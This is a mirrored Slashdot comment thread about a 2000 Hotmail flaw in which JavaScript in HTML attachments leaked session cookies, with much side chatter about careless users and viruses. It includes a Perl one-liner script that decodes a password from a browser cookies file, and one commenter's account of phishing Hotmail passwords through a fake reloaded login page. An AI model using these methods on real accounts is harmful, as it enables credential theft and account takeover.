Slashdot Mirror
Another Hole in Hotmail
Ancipital noted that a new hotmail hole has sprung up. This one is, like the ILUVYOU bug, a VBS macro attachment that must be executed by people with very (ok, who does this, huh? I mean, viewing a gif or clicking a URL, but running a strange program? The mind boggles).
Maybe they were overwhelmed by dialog boxes popping up and were just doing whatever it took to make the dern thing go away.
The clearance system sounds logical. It is not. It is completely arbitrary. -- John Bolton
About six months (mainly as a spamcatcher) and I quit using it when it became necessary to have javascript enabled to access my account. I have the nasty stuff turned off in Netscape.
~REZ~ #43301. Who'd fake being me anyway?
When you look at pop culture, and other countries leaders, it's obvious that most people are that stupid. I'm surprised the result wasn't higher.
--
On a very similar idea you could also have a form where there was the explanation, in which was said at the end to type "yes" or "no" into a text box and click okay. Perhaps something short but unique could be used for each different box. I think "virus threat accepted" is a little long, users might make a typo and not figure it out.
E.G.
You are about to format your disk. Formating your disk will erase all the information on it. Type "format" into the text box and click okay to format. Type "no" or click cancel to stop this operation. Remember, this formatting the disk will erase all information on it.
---------------
|                            |
---------------
    [okay]     [no]
-- no
Shouldn't that be Monday OR Friday?
For the online signup stuff, I have a pseudonym that has an e-mail alias on my own domain name that sends incoming mail to /dev/null
Very convenient - I never even see the spam.
Same kind of thing when you go to an AOL chatroom and tell them they can get your pic by pressing ALT+F4, it's been around forever, but the cluebies still fall for it. Idiots. :\
Slashdot poll suggestion:
In order to continue reading the pr0n trolls on Slashdot, you must pour a bowl of hot grits into your hard drive right now, and click OK. Do you wish to continue?
(Glossary: "hard drive" is usually used to denote the secondary storage device on your computer...)
Poll Mastah
I wonder what hotmail does if you check the "remember my password" option..
It probably just sends you the same cookie but with an expires field, so the browser will store the cookie on the hard drive. If the cookie doesn't have an expires field, then it's kept only memory. If you need to login as a new user, restart the browser.
Of course, if one is going to do something like this over the Internet, it should be encrypted. BTW, slashdot isn't the only one. Linuxtoday.com uses plaintext cookies for authentication also.
the good ground has been paved over by suicidal maniacs
Message I got when deleting my spam bucket:
Message to Hotmail Members
We apologize, but your account is temporarily unavailable. This delay does not affect the entire site or relate specifically to your account, but the machine that holds your account information is temporarily unavailable. We do not expect this delay to last much longer, so please continue to check our site for your account status.
We will do our best to make your account available as quickly as possible. We appreciate your support, and sincerely apologize for the inconvenience.
© 2000 Microsoft Corporation. All rights reserved. Terms of Service Privacy Statement
"`Ford, you're turning into a penguin. Stop it.'" -THHGTTG
Naah, no-one would be stupid enough to embed a plaintext user password directly into an authentication cookie. Well, maybe Microsoft and Hotmail, but no-one who had the slightest clue about the issues Slashdotters care about.
Would they?
#!/usr/bin/perl -w
open COOKIE, $ENV{HOME} . "/.netscape/cookies" or die;
while (<COOKIE>) {
if (/slashdot/) {
chomp;
my @args = split;
my $cookie = pop @args;
$cookie =~ s/\%25//g;
print pack("H*", $cookie), "\n";
}
}
--
Xenu loves you!
I once read that Wingate was full of holes. You might want to look into that.
Actually, they were infected by the Intelligensia Virus, which causes dumb people to make what they believe to be intelligent, informed decisions..
I hadn't thought about it quite like that. While dialog boxes in Windows are not limited to error messages, maybe they should be.
...and you're right, I run Gnome on my PC at home, and the only dialog box message that I get regularly (that I ignore) is the one that tells me I'm running the Gnome File Manager as root and that I could damage my system if I'm not careful.
I don't use Hotmail. Does it automatically display HTML attachments?
Using an HTML file to execute malicious javascript seems pretty straightforward. Are any of the other web-based email services (Yahoo, Eudoramail, Mac.com, etc) vulnerable to similar attacks?
If your mental age stayed in the single digits, I suppose it could approach a low number, since you IQ is your mental age divided by your physical age.
Try logging on to Hotmail, not touching anything for 30 mins and then clicking on 'read mail'. If they have the server set up sensibly, you'll have to enter your user name and password again.
On the other hand, if Microsoft have done something really really dumb, like including the password in a cookie, then there's really no hoe for them.
Hotmail stores your user information in a session cookie, not a persistent (disk) cookie. If you close all your browser windows and access hotmail again, you are required to enter your password again... unlike Slashdot I might note.
I know the session cookie has an expiration period, but I don't remember what it is. Probably something like 20 minutes.
-konstant
Yes! We are all individuals! I'm not!
-konstant
Yes! We are all individuals! I'm not!
HTML and RTF allow us to format email far more effectively than plain text ever will. Shouldn't we just make them more secure?
You use RTF for email? HTML -- if stripped down to the most basic tags -- I can understand, but why RTF?
A firewall can not protect you from yourself. Turn off what you do not need. Do not use the firewall to do your work.
I thought this story was quite. Besides being, it was to read! I wonder why Microsoft can't get off, and implement.
This is not, the JavaScript exploit in existence! Microsoft should, otherwise the users. The mind boggles.
But then again, I rarely. So who. Well!
I got a Hotmail account years ago (my first email account, and before MS bought Hotmail). I still have it, although I don't use it that often. I really only use it as an alternate account during the summer, since my school account won't let me log in from a different server, and because several of my friends keep sending me stuff at that address even though I keep giving them the new one.
---
Zardoz has spoken!
Oper on the Nightstar
Right?
Not everyone knows the difference. They see the attachment and click. After the last one, I sent an explanation of how to figure out what kind of file the attachment is (by looking at the extension) and why it's important to know before you click on it.
Since I support a hundred-plus windows users, I'm not really surprised that people don't know this. I'm sort of irritated, though, that if I don't tell them stuff like this, they aren't going to learn it anywhere else. The programs don't have little warning screens about it, and no one will ever RTFM, so they're stuck. Good thing we don't use Outlook here, eh? We still got last week's virus, but only two people lost
-jpowers
-jpowers
It seems to me that it would be fairly trivial to embed an ActiveX component in an HTML email, to mess with people who read their mail with ActiveX-enabled software (Hotmail via MSIE, Outlook, etc.). Since ActiveX is just plain-vanilla binary executables with the most minimal security imaginable, it could do all sorts of unpleasant things when viewed. It could, for example: propagate itself (by interfacing with Outlook), embed itself into every HTML file on the user's hard drive, embed itself into all outgoing HTML mail (in which case it could become nearly uncatchable), send all sorts of info over the net, install backdoors, etc. I'm surprised it hasn't been done already.
---
Zardoz has spoken!
Oper on the Nightstar
It is not a matter of educating people. We will never be able to educate everyone enough. People will always be stupid. Even if you are the smartest person, you still do remarkably stupid things. I have yet to meet the person that can not qucikly think of at least 5 times they did things that any rational person would comment as completely stupid. As for people cliking in an email for most users a computer is as much of a magic creation as the internal combustion engine. How many drivers know exactly how their car works and can repair it? These computer users are the same ones that repeatedly send forwards on because if they send it to 200,000 people Timmy will receive millions in health care and they will see a cool qt movie on their pc. People do stupid things. We will continue to do stupid things. Therefore education helps but people will always clik a button if the pros seem to outweigh the posssible negatives. Or even if it is jut in front of them. just my one cent.
I am 31337 or something.
you see, this is the problem with the world today. everyone is so concerned with the format and correctness of everything, not of what it is trying to tell you. it doesnt matter one bit if his grammar is wrong, if he spells something wrong, etc, its just being anal about something so completely insignifigant that brings nothing but stress to everyone. get over it, it not going t affect your life if someone talks differently then you do, and if it does, your life must not be worth that much.
point in case, my lack of capitals and most punctuation, i hope it gives you nightmares.
-Malachai
-Sometimes i want to masturbate but then i feel that i dont deserve myself.
We've had the same here in Luxembourg where a local radio station reported that ILOVEYOU had destroyed millions of computers (Did their CPU explode?) but completely forgot to mention that one could just delete the mail without launching the attachment and that's it.
They also said that there were no Antivirus tools available that could detect VBS.LoveLetter which was just plain wrong, as I had downloaded updates for InnocuLAN, McAfee, Norton AV and AVP about 2 hours before their report.
Hmm - a tip. When looking for karma, try getting your facts right. As anyone who reads
---- Den ene knappen er powerknapp, den andre er Bender voice knapp "Bite My Shiny Metal Ass"
The point was that people don't read the dialog.
;), but normally it is not what you want. The point of the poster you replied to was that the user doesn't need to know that formatting is bad and thus you don't know for sure 1 out of 3 users don't read dialog boxes.
Yes, but the point was that users *might* think that formatting the HD is a good thing. Sometimes it is, when you detect Windows on it, to install OS blablabla
Thimo
--
Avoid the Gates of Hell. Use Linux!
... is that most users don't know that other extensions than .exe can actually run "a programme". So even if they did see .js or .vbs they wouldn't even know not to run it. For most users, the only way to find out what type a file is, is to double-click.
I think he was about to say "with very small cranial cavities", but I could be wrong.
-- Cisk for the Cisk God
Err actually both are not necessarily true. It is not difficult to find a situation where (a) the engine speed will decrease or remain constant; and (b) the speed of the car will decrease or remain constant when you floor the gas pedal (e.g. while going up a steep hill with a small engine or heavy load).
The name "accelerator" is a bit confusing because it implies that it will cause your car to accelerate. More often than not, it's used to keep your car at a constant speed, and oftentimes it will be used to slow the car down. Most people wisely don't call it an "accelerator".
Rather, most people call it a "gas pedal" and likewise use phrases like "giving it some gas" and "laying off the gas". This to me shows that they have a very good understanding of what the pedal does: it allows more gasoline into the fuel mixture. Also, it would seem that most people will not expect the gas pedal to cause any sort of positive acceleration when going up a steep hill (for example), so I'd say your assumption that most people just expect it to speed up the car is false. Also, your assumption that it doesn't matter would also seem to be false, otherwise extreme confusion would ensue when people would drive in hilly or mountainous parts.
This may seem off-topic, but it's not. Would it be too much to ask to give the populous at large the benefit of the doubt? Most people know what's going on with most things, and they don't need it to be overly dumbed down. The worst case of this is retarded software companies who make programs that mimic real-life devices in order to presumably make it "easier to use" (examples are CD players which look like real CD players, chat programs which look like telephones, e-mail programs which make analogies to snail mail protocols). Oftentimes, the program will be come out extremely crippled, and pretty much inferior in every way to its competitors. Also, it come out being a little bit condescending, which I'm sure can't help its sales. People know that an increase in gas in the fuel mixture in their car causes an increase in power because they've experienced it, not because there's a sticker that says "speed" or any such nonsense pasted on to it.
Just the addition of an IP address encoded as part of the session key will block out *most* of the people who could grab your cookie for this hack. The only ones it doesn't affect are those with the same IP address as the unsuspecting Hotmail user, which would occur if the Hotmail user was behind the same proxy as the perpetrator. Its an easy change to make, since they are (assumedly) already going back to verify the session key in some respect.
Write a Javascript embedded in an HTML that automatically sends the reader to another website. How much damage can you do to a person's PC once they get to a website? Especially with Java or VB/JavaScript?
The problem would be that it wouldn't take long for the site to get shuttered and the manhunt would be on. Perhaps.
If you aren't part of the solution, there is good money to be made prolonging the problem
Unfortunately, software requires you to make decisions, and dumbly clicking on "OK" all the time is seen just as a quick way to make the problem go away. Unfortunately, it's not the case. Ideally, the user interface of an application should be engineered and designed to stay flexible intuitive, easy to learn while popping up the minimum number of questions. These goals cannot be accomplished all the times for every situation. In such cases, where the full attention of the user is needed, I'd suggest to force him to use a different input device in order to proceed than the one he usually uses. Today it would mean that you'd have to require confirmation via keyboard (perhaps requiring to type an extensive `yes' instead of a simple `y' (or whatever). I know this may be source of troubles, but I don't see alternatives if questions can't be avoided.
I developed it on paid time, it was company property. I didn't keep a copy (I don't use Windows at home for anything but games, so I wasn't tempted).
I was pretty sure it would spread to millions of computers, and I'd get a bonus. Instead I got a pat on the back from the guy in the next cubicle (who didn't install the software either), and the company refused to hire me as a regular employee when my co-op term ended (despite demonstrated ability as one of their best programmers, and their desperate need for a rewrite of an in-house package I was intimately familiar with, I was "unqualified" without a degree). Very disappointing.
I also don't use Lookout Express.
Yea.. it sure does! Also provokes a swearing response and a tendency to scream if something important is being worked on .. well, it does from me as it's FAR too frequent with my machine running Nice Try SP6 .. i.e. it actually happens. Only time I saw Linux kernel panic was when I had a machine with a dodgy simm socket and half the machine's memory just 'disappeared'.. kinda understanding it would get upset..
Anyway.. I digress.
--
Delphis
What they are really suggesting is that Microsoft should bundle anti-virus software with Windows and Outlook. Seems to me that the bundling issue got you guys into a bunch of trouble already.
You can't have it both ways folks. If you are going to split Microsoft in two for bundling software, you can't demand that they bundle more software to protect from virii.
Ugh. Expecting anything but bigoted bullshit about Microsoft from /. is asking too much, it seems.
No, Thursday's out. How about never - is never good for you?
the tricky part about this is that you don't need to click on the attachment. Hotmail, just like many of the other newer email clients, recognizes it as html code, and embeds the html page into the page automatically. Unless you've changed settings, this will happen without you actually doing anything.
it's not a vbs file. it's an embeded javascript. there is no virus check run because it's not a virus and there isn't an anti-virus that checks for potentially malignant javascript. Hell, the creator only had to identify the cookie, the username, and the server the cookie was being held on, and automatically send all of this info to another account (which could have been a hotmail account)
Not everyone had to actually open the attachment.
No lie, I work on a college campus with PhD's who will open anything...we had several people run the ILOVEYOU .exe without even thinking twice about and then they piss and moan when I tell them it will be a day or two before I can find the time to come out and rebuild their machines.
ID10T's....all of 'em.
if electricity is created by electrons, is morality created by morons?
I tried this thing on my Yahoo mail account and it changed the <script> tag to <cursive>
OK, so bashing hotmail.com in /. is pretty easy, but there is one single aspect that I think makes hotmail the best free web-based e-mail service: they do close spam generating accounts or drop-in box accounts. You guys in this thread seem not to pay much attention to this.
I used to receive about 5 spam messages a day and never have I sent a complaint with a full header to abuse@hotmail.com I got spam from the same address again. I can't say the same about any other web-mail.
Many people don't understand the ramifications of actions online. Just like long ago on AOL, even though the was a warning label on everything, people still gave away thier Screen names and passwords.
If you insist on designing software services so easy that an idiot can use them, then expect idiots to use them. Now couple this with a need to "innovate", ie force out upgrades to software with features that people don't need then what do you expect?
What kind of grammer is that?
With very what?! Egads.
Linux Band Bratwurst Orange
Beos Band XIR: Xir is recursive
when Push Comes to Shove
Except that all news client I know displays the extention anyway so you'll have to save the file and open the folder you saved it to in order to have the extention hidden
Not exactly the same, is it ?
Not a bias, just good common sense.
--
Seth
$5 / month hosted VPS on linux = awesome!
I was nothing short of amazed at how many people clicked OK. It must have been at least a third, if not half.
Got Rhinos?
From the ZDNet article:
Bennett Haselton, Webmaster for Peacefire.org, said the flaw involves sending a user an e-mail with an HTML attachment. When the user clicks on the attachment, the file sends a copy of the user?s cookie to the hacker.
Once that cookie is received, the hacker can insert it manually into the Netscape cookies.txt file and use that authentication key to log in to Hotmail as the user. Click here for a description of the trick.
<snip>
Not a 'trivial bug'
Since the cookie does not contain the user's password, the hacker can only access the account when the user is logged on and as long as the authentication code is valid. But Haselton said that five minutes would be long enough for a hacker with a prepared script to download all of a user's e-mail messages.
Best I could see, theres no email floating around doing this - its just an idea at this point. And for it to propagate(sp?) like luvbug or melissa, it'd need a script to use the hotmail address book. As it sits right now, it'd just come from one guy who knew lots of hotmail addresses. Someone correct me if I'm wrong on this, tho :)
-----
If Bill Gates had a nickel for every time Windows crashed...
"I'm sure the manual will indicate which lever is the velocitator, and which the decelleratrix..."
- C. M. Burns
clearly that is not true. 35% of all statistics are just made up anyway
Initialize works well...
Cris E
St. Paul, MN
What I saw made me laugh over and over again. The news people on almost every channel gave the following advice.
1.) If you get an e-mail that your not expecting (hmmm all of them!) call the person and ask them if they sent you mail.
Why don't you just drive over to their house and ask them.... DUH!
2.) Make sure you virus software is up to date.
Hello! This didn't work and wouldn't work because this was a NEW virus. They had a virus defintion only hours after the bug hit! What good would it have done!
Linux is only free if your time has no value. Windows is only free if you threaten to use Linux.
Or customer service.
Good job!
A choice of masters is not freedom
Maybe you should read up on the facts. She was the passenger in a car... the driver pulled over so she could add stuff to her coffee, she took off the lid and it spilled on her. The issue was that the coffee is way hotter than it should have been, but she still should have been more careful.
-- Dr. Eldarion --
It's not what it is, it's something else.
Today I downloaded all the headers from my snotmail account. 1210 new massages! arrgh. . . .
mountvol \\?\brain{dbe069b1-65ae-11d5-bab4-806d6172696f}\h
You're right, it is the MAIL servers job to send/receive e-mail. However, with web based e-mail, the WEB server basically has to act as your e-mail client. If that was left up to the browser, the browser would have to be written to work with ever online mail service AND each time the inevitable hole is found, you'd have to download a new browser.
kwsNI
...but what about folks who defrag their hard drive every time they get a javascript run error.
I'm on the fence between ease of use and mandatory education. (Mostly cuz I drive a car but couldn't tell you how it works...pot calling the kettle, eh?)
The Divine Creatrix in a Mortal Shell that stays Crunchy in Milk
The House Between - Original Sci-Fi Series
that is alot of dialog boxes
Having worked in an all M$ shop for the last three weeks, I can tell you that you are right. Many of the users do not know what formating is. I can also tell you that most will click or run just about anything! 1 of 3 is a low ball estimate for where I work. Those people and myself generally read no further than OK. Woops, it blew up, so what? Application reliability is terrible to begin with and most people have just given up. Their powerlessness has been demonstrated again and again as reasonable applications were replaced with MS counterparts. With their power to choose went all feelings of responsibility. They have given up.
If you click here a message declaring your love for Bill Gates will be posted to Slashdot in your name.
Any takers?
numb
Uh they can't be true. Hotmail accounts are deleted after 3 months (or is it 4?) of non use.
Ok, while I disagree with your point in general, I will concede that it is the meaning of a sentance that makes the most difference. However, a trailing adjective/adverb that modifies nothing is a problem anyone can be justified complaining about. This is why it bothers us when we see stories that have sentances that just
I know. Switch to full screen mode with blue background and display your wanring in white text. That never fails to provoke knee-jerk reaction.
isn't this related to the Trojan Horse Issue that the ZOPE guys posted yesterday?
That way I have something to point to when someone asks me if it's OK to open email attachments. Doesn't work too well over the phone, but I'm sure I could make use of a suitable GIF on the web server..
73 de N5VB (ex-KD5BIV) AR SK
Thats an easy opinion to take when you're young, but when you have to join the real world and effectively communicate with those around you it just doesn't cut it. If you can't get your point across in an acceptable dialect, people will ignore you or make fun of you. While you may think that's wrong, proper spelling and grammar (which I do not claim to always follow to the letter) are two areas of conformance I agree with.
If you don't think it matters, watch how many people comment when CmdrTaco or one of the others uses atrocious spelling and/or grammar. While it may be acceptable in certain communities (such as this one, to a degree), try turning in a paper to a professor or a design document to your boss and see how far it flies.
I disagree it doesn't have to act as a client. It presents the data to the browser who is the acting client. I guess if you want to get wild about it, it could be a client as much as pop3 is a client; their job is to get data to and fro not inspect and decide what you get. (maybe I'm just and old crusty bastard but that's the original intention of mail and I'm sticking to it).
The problem with your suggestion is that not only do these exploits work for Hotmail, because the client readily accepts them, any other site can send bad javascript to you. If the client would prevent you from executing bad code to begin with there could be 20 billion new exploits but if your browser didn't run them not only would your Hotmail account be fine but all the other sites one goes to doesn't have to be worried about either.
Folks at MS should have known better than leaving attachments unprotected like that. They should compile attached html files into word documents or something :)
Listen, this is not really a new bug, this has being there for a while. A couple of month ago I used JavaScript and my school account to collect some passwords from some unsuspecting users of HotMail. It was very easy. The attached HTML had JS that reloaded the parent page not from HotMail but from my own server. (I just copied the entire page) most people did not notice that the URL does not belong to MS, they decided that Hotmail threw them out and they tried to relogin. A script on my server read the password and the user name, then sent back a page with the password and username and 'onload' submitted that info to the MS servers (this way the user actually logged into their hotmail accounts but I still had their passwords). The trick was to control the parent window, for some reason the exploit only worked in Netscape 4.x not in IE.
Well, there is always next time.
You can't handle the truth.
http://www.washingtonpost.com/wp-dyn/articles/A373 62-2000May9.html
C'mon 'boys'....
Wonder if there is a contract with Katz involved....
Blar.
Here's the exploit:
1) Find a story about technology (if your name is "Katz" this step is unneeded)
2) Skim the headline of said story to "get the gist".
3) Submit story to Slashdot, paying special attention to making it seem like this story is related to some hot topic.
For instance, if the story is about a misconfigured website allowing a security breach, make it seem like the story is related to a recent email worm by working "email" and "Visual Basic Scripting" in there somehow.
What's the effect of this exploit: In all the excitement of having another Microsoft bashing story will hurriedly type your submission onto the front page with plenty of spelling errors and word omissions.
--
Have Exchange users? Want to run Linux? Can't afford OpenMail?
Linux MAPI Server!
http://www.openone.com/software/MailOne/
(Exchange Migration HOWTO coming soon)
I use mine only to sign up for anything online.
Basically, all it ends up being is an online junk mail repository! (which I rarely ever bother to check)
-WD
How this seems to work is that someone emails you an HTML file as an attachment.
If you then view the attachment through Hotmail, Javascript in that attachment can then pretend to me from the Hotmail domain, and therefore access any cookies that Hotmail has set up. It can then submit these values to a form on another, hostile, server.
These cookies then allow access to the site from a user pretending to be you, allowing them to read and delete your emails or send email from your account.
It's not clear form the article, but presumably the relevant cookie is the one holding the user's session key. In a typical implementation this key will be useless after 30mins or so, but the length of the timeout is really whatever Microsoft chooses it to be.
Try logging on to Hotmail, not touching anything for 30 mins and then clicking on 'read mail'. If they have the server set up sensibly, you'll have to enter your user name and password again.
On the other hand, if Microsoft have done something really really dumb, like including the password in a cookie, then there's really no hoe for them.
-Ciaran
Think of how dumb the average person is. By definition, half of the population is dumber than that...
Technically, wouldn't that be the median?
One more drink, and I'll move on. --Dave Matthews Band
Ah. I feel MUCH better now! Now I have to go delete some email before I lose my cookies! <grin>
I just want to take over the world...Why does that automatically make me EVIL?
This reminds me of the problems one might to ensure that a "clickwrap license" is read and agreed to by the consumer. The traditional method of ensuring that the agreement is actually read is to disable the OK button until the user has scrolled through the license. But how can you ensuretaht a reader actually reads what's scrolling past? I propose a multiple choice reading comprehension exam.
Request to rename Hotmail into Holemail (other variations such as Crackmail are accepted)
You can't handle the truth.
Perhaps this hole explains why Hotmail is down.
Could they actually be fixing the problem? Naaah.
Here's the message one gets on login:
"We apologize, but your account is temporarily unavailable. This delay does not affect the entire site or relate specifically to your account, but the machine that holds your account information is temporarily unavailable. We do not expect this delay to last much longer, so please continue to check our site for your account status.
We will do our best to make your account available as quickly as possible. We appreciate your support, and sincerely apologize for the inconvenience."
I run outlook in a largish corporation. If you want, I can give you a list of a few hundred people that click on strange attachments.
-- It is too late for the pebbles to vote, the avalanche has already started.
There have been enough well-publicized problems with internet email that everyone with a brain knows they are not secure. Doesn't everyone just use thier hotmail accounts to enter on website forms, so they don't get spammed so much?
Saying "hotmail has security holes" is like saying the sky is blue.
Don't forget that Friday is Hawaiian shirt day.
They still bias the average over the median. It might not be much, but still...
Think of a population of 3, two have intelligence value of 1 (any metric) and one has value 1.5. Now the average is 1.166666 and 66% is below that! Not by much, but it is below! What I am styatin is that the two tails are not symmetric and the net result is a median (slightly) lower than the average. Thus we have that more than 50% of the population is below average! Not by much, but below.
uh. Why do people even use hotmail? Last I checked, everyone and their grandma has some free email service.. mail.yahoo.com, excite, etc.
Um....? Why log in at all?
Female Prison Rape in NY
pronoblem
Female Prison Rape in NY
And the flipside to this:
Why do we need more than plain text for email?
I like email to appear in the standard fonts and layout *I* want, not what somebody on the other end of the line thinks is cool. I don't want to waste the time downloading the extra bloat for HTML. I don't want this bloat replicated to the hundreds of people that subscribe to the mailing lists I run. I don't want the PINE users who subscribe to the lists bitching endlessly at me because they're getting HTML attachements.
Comformity to standards brings efficiency.
If something needs formatting, that's what attachments are for.
Adam
Anyone who falls for something like that DESERVES to face the consequences...
if they didn't learn all the times that the services say "DON'T GIVE YOUR PASSWORD OUT TO ANYONE", then maybe that will teach them a lesson.
-- Dr. Eldarion --
It's not what it is, it's something else.
To you and me, formatting means erasing. But that's only true in techno-speak. In every other context, the word "format" does not imply erasing - not at all! And since very few people actually format their hard drives (and hence, have no experience with the process), how can you expect them to know what that word means?
When you "format" something, you arrange it. You put it into some kind of order. To most people, that's a good thing! The moron who decided that "format" is a synonym for "erase" should be shot.
If your application had asked the user to "erase all files on your hard drive", I think very few people would have said yes.
And the men who hold high places must be the ones who start
To mold a new reality... closer to the heart
An economy built on 20 years of incompetence won't go down without a fight. Security and vulderability of MS OSes is today just as big an issue as when I first encountered the Jerusalem virus in 1988. Where is the innovation now, MS?
XML causes global warming.
I wonder how many people fell into that trap, thinking they were gonna get into someone else's account.
Got Rhinos?
I used it for a while when I was travelling alot (to grab my home POP3 mail, work has MS Exchange with Web Access, which is the dogs danglies..), now my ISP has a decent webmail interface and I only use HoTMail for testing accounts etc, and for MSN Messanger.
McC
You can educate people until you're blue in the face. Only those who want to learn will learn. When I was a sysadmin, there was certain collection of individuals that would ALWAYS need help changing their passwords when they expired. No amount of education could make the difference. FYI: Some of these people had Master's degrees.
the windoze default setting is to 'hide' the three letter file extenstion. If the attached file was named noodiepic.jpg.vbs, it would appear as noodiepic.jpg . Most people would feel safe (yet perverted) by opening this.
After our beloved NTServer was 'Loved', the people with this setting only noticed the jpg icons had changed and kept infecting away. I changed this setting on all infected users to help remind them what file type it actually is.
Hey, leave comments about my mother out of this!
I saw something funny on CNBC during the ILOVEYOU worm outbreak. They were advising people not to save attachments to disk, as that could lead to infection, but to just execute the attachment. Not only was the mainstream media not educating people, they were actively making it worse.
The Economics of Website Security
I still use my Hotmail account...as a Spam Trap. I log in once every 6 months or so to delete everything. Works like a charm!
I just want to take over the world...Why does that automatically make me EVIL?
I still have my hotmail account, I use it as my "spam bucket". You know those free website that offer free accounts (like the new york times), but you have to give them you email address? Also when registor with search engines, sign up FREE to win crap out there, just use a hotmail account and see how long it takes to fill completly full with spam (it took mine 3 days!)...
A neat treat though, just put a filter in to filter out anything with 'A' in the subject, they allow like 5-10 filters, so delete everything that has a vowel in the subject line!
"`Ford, you're turning into a penguin. Stop it.'" -THHGTTG
After the machine is infected is where the hidden extension comes into play. Or if someone was mapped to your machine, and they became infected, and you had no clue (the biggest problem in our outbreak). Then, since you didn't open the emails, you disregard the warnings, and open up your (infected) jpg's. And boom, you spread it around again, now on your entire hard drive, and everything you're mapped to.
I wonder.... how many people will take the time to realize that it was a bunch of BSD hackers who implemented this hole, and not engineers at Microsoft?
I am very small, utmostly microscopic.
It is "executed by people with very" little computer experience who cannot even form one complete and coherent English sentence.
ByteMyCode.com: A Web 2.0 code sharing community.
I've had a hotmail account for about 3 years and I still use it.
:)
Everytime I sign up for anything on the internet, anytime a webpage asks me for email, any time I have to put in an email address to 'register' a program, or any convention I sign up for, I put in my hotmail address... They then usually ask me a bunch of personal questions. I'm always 25-35 male, I make $100,000+/year and am single. And when you see all those little boxes where you check off your interests? Well, I check them all. Then I check (or uncheck) those boxes that ask me if I want their monthly, weekly, daily email magazine. Oh, and I want all the updates whenever they update their software/web page, etc...
I currently get 7-8 emails a day at that address.. about twice a week I get one from Hotmail Staff telling me my mailbox is full..
That is *absolutely* the case. That's why the ILOVEYOU virus author renamed files not from file.ext to file.vbs but to file.ext.vbs.
Moderate Chris Hiner's post UP.
I've used it for four years. The only two times I considered giving it up wer when MS bought them (and immediately added nifty little features like defaulting to MSN, passports, and having to tab twice to enter username and password) and when I started getting spammed really bad by Email.com, AOL and Yahoo users. But then I realized that if I switched to any of the other big ones previosly mentioned it would probable get worse.
YEA FOR YOU!
Are you self taught?
How many hours have you logged?
How long before you were really good?
I never checked what they run (don't really care as long as it works) but I use newmail.net - you can use their web-based access, or they have a POP server you can also use. They also have a SMTP server that you can use, too. I have been pretty happy with them. Much more that with Hotmail.
Moon Macrosystems. Sun's biggest competitor.
Well in actuality if you format your HD and havent written anything else to it since format you can recover the files. When you format your not overwriting the data just clearing the node entries.So a recovery is very possible.
ctrl+shift+S
Dude, good times was a hoax. Get wit the program.
spoo
yeah, true... but it was still a funny comment, darn it
Ummm, dumbass.... Macros can go into standard .doc files, not just .dot, so i think you might want to re-think your little program idea.
People with accounts on lots of services tend to recycle passwords, through laziness or ignorance. So if you can infer from someone's email what other services they use, you have a good chance of taking them over too.
I used to do frontline support at a University - you would be amazed at how many people use the same password for everything.
however even with the file extentions on, windows refuses to show the .pif extention, and it's icon can be changed to whatever... i've thought this to be an interesting concept for a while, just waiting for someone to exploit it now...
Now everybody's equal, just don't measure it. -Bad Religion
Never used hotmail, but I've had some rather good experiences with yahoo's free mail service.
-- Dr. Eldarion --
It's not what it is, it's something else.
The proper extension for a Word file with macros is ".dot", because it's a template (a Word template is a dynamic object which produces documents, a Word document is a static object and can't contain code) - just because Word is too stupid to complain if you name it ".doc" doesn't change that. What you're saying is like insisting that a ".jpg" can hold formatted text, arbirary JavaScript, and hyperlinks because if you rename an ".html" file to ".jpg" IE will still open it as HTML.
At any rate, my program detected macros in files with the extension ".doc". It wasn't a program idea, it was a working program that I tested and proved effective.
From http://www.emergency.com/wordvrus.htm:
An important point to make here is that Word documents (.DOC files) can not contain macros, only Word templates (.DOT files) can contain macros. However, it is a relatively simple task to mask a template as a document by changing the file name extension from .DOT to .DOC.
I hate pathetic morons who go around insulting people for imagined mistakes without checking their facts.
I bet in the UK you couldn't sue a restaurant (and win) because you spilled coffee on yourself.
-- Dr. Eldarion --
It's not what it is, it's something else.
I am using a module for the ROXEN web server called IMHO (Internet Mail HOst). Just started trying it. It works well to access IMAP mail boxes over a web interface.
The only disadvantage is that you have to be using Roxen since it is written in RXML, but some may not consider that a disadvantage.
BTW I am using it with FreeBSD, but it will work with Linux too.
Concerning this hotmail exploit, there is the same security risk on the Mac as with Wintendo. Key here is that you're not using Hotmail, but Microsoft's other e-mail product. With Lookout express on the Mac, you're safe from all the VBS ILOVEYOU-styled trojans.
Seth
$5 / month hosted VPS on linux = awesome!
This is not true ``by definition'' at all. Half the population is dumber than the average person only if the median of the dumbness distribution is equal to the mean.
At a certain large Canadian technology company, after having the email shut down by a Word macro virus panic, I once wrote a program that identifies attachments with a ".doc" extension that are actually ".dot" files (Word document templates that could contain macro viruses). If it was a real ".doc", it just opened the file with Word; if it was a ".dot", it put up a dialog box with big biohazard signs that said "This is a falsely labeled file! It could carry a virus or trojan horse! ARE YOU SURE YOU WANT TO OPEN IT?"
Everyone who saw it, including my boss, agreed that it solved the problem completely. However, nobody installed it, and nobody outside of my department was shown it. It was almost certainly deleted shortly after I left the company, and the vulnerability (to a few specific viruses) solved several months later by purchasing expensive anti-virus software.
Home users have an excuse: most of them are ignorant. They have a vague idea of some portion of what's on their hard drive and what's on the internet, and of the difference between an application and a document. Corporations, though, want a simple solution: money out, invulnerability to viruses in. The answers have been jumping up and biting them on the nose from any halfway decent MIS department, from security websites, from annoyed articles in the trade papers, but the managers involved want their computers to "just work", and not be bothered with having to think (or making all their employees apply common sense, which, I must admit, is about as difficult as teaching cats to march in formation).
Well, as if you can't guess... I dropped mine like a hot potato when MS bought out Hotmail... To understand recursion, you must first understand recursion...
"To hope's end I rode and to heart's breaking: Now for wrath, now for ruin and a red nightfall!"
My wife uses Hotmail, because she likes the convenience of getting her mail through a web browser, from any computer. I've seen a few apps for Linux that allow you to pull your mail off a POP or IMAP server, and access it through the web (ACME mail comes to mind - http://www.astray.com/acmemail/)
Has anyone used this, or similar programs? How well do they work? How insecure are they?
It'd be nice to set up an alternative web mail system....
---
Even if you tell a person not to execute programs attached to emails that person won't believe you (or likely won't know what you are talking about). They will execute it anyway. Further proof of incompetence come when even after infecting themselves with some thing nasty, they open the attached FIXFORTHELOVEBUGTXT.vbs the next day.
Why should we restrict our email to plain text ?
HTML and RTF allow us to format email far more effectively than plain text ever will. Shouldn't we just make them more secure?
McC
Don't you mean "Only Hitler..."?
My boss does this. I spend at least half an hour a week backtrcking through the spastic clicking he does when unexpected dialogue boxes appear. Incidentally, I work for Microsoft. No kidding.
(Also confusing the matter: I don't think you can score anywhere near 0 IQ without being dead.
The cake is a pie
